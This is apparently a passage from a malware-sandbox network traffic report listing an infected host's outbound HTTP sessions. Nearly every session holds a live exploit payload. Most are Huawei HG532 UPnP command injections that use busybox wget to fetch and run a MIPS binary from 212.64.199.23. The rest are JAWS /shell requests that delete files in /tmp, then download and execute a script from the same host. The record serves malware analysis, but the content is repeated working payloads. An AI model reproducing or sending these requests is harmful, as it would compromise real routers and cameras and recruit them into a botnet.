                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          42192.168.2.155172641.89.186.10337215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.437438011 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          43192.168.2.1538764197.153.167.12537215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.463694096 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          44192.168.2.1542968197.109.186.14937215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.465620041 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          45192.168.2.1544592178.15.78.9780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.495879889 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          46192.168.2.153503041.237.200.16437215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.496005058 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          47192.168.2.1553500126.88.175.21580
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.531649113 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          48192.168.2.155637666.135.17.8780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.533236980 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          49192.168.2.1538698206.18.177.1280
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.559669018 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          50192.168.2.1547320197.14.66.1237215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.559799910 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          51192.168.2.1538780197.109.31.17537215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.591675997 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          52192.168.2.154778641.137.229.24780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.591825962 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          53192.168.2.155396682.32.93.11080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.623729944 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          54192.168.2.1533700197.133.40.2437215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.656359911 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          55192.168.2.153876041.29.6.12237215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.657635927 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          56192.168.2.1549810156.80.186.25337215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.659847021 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
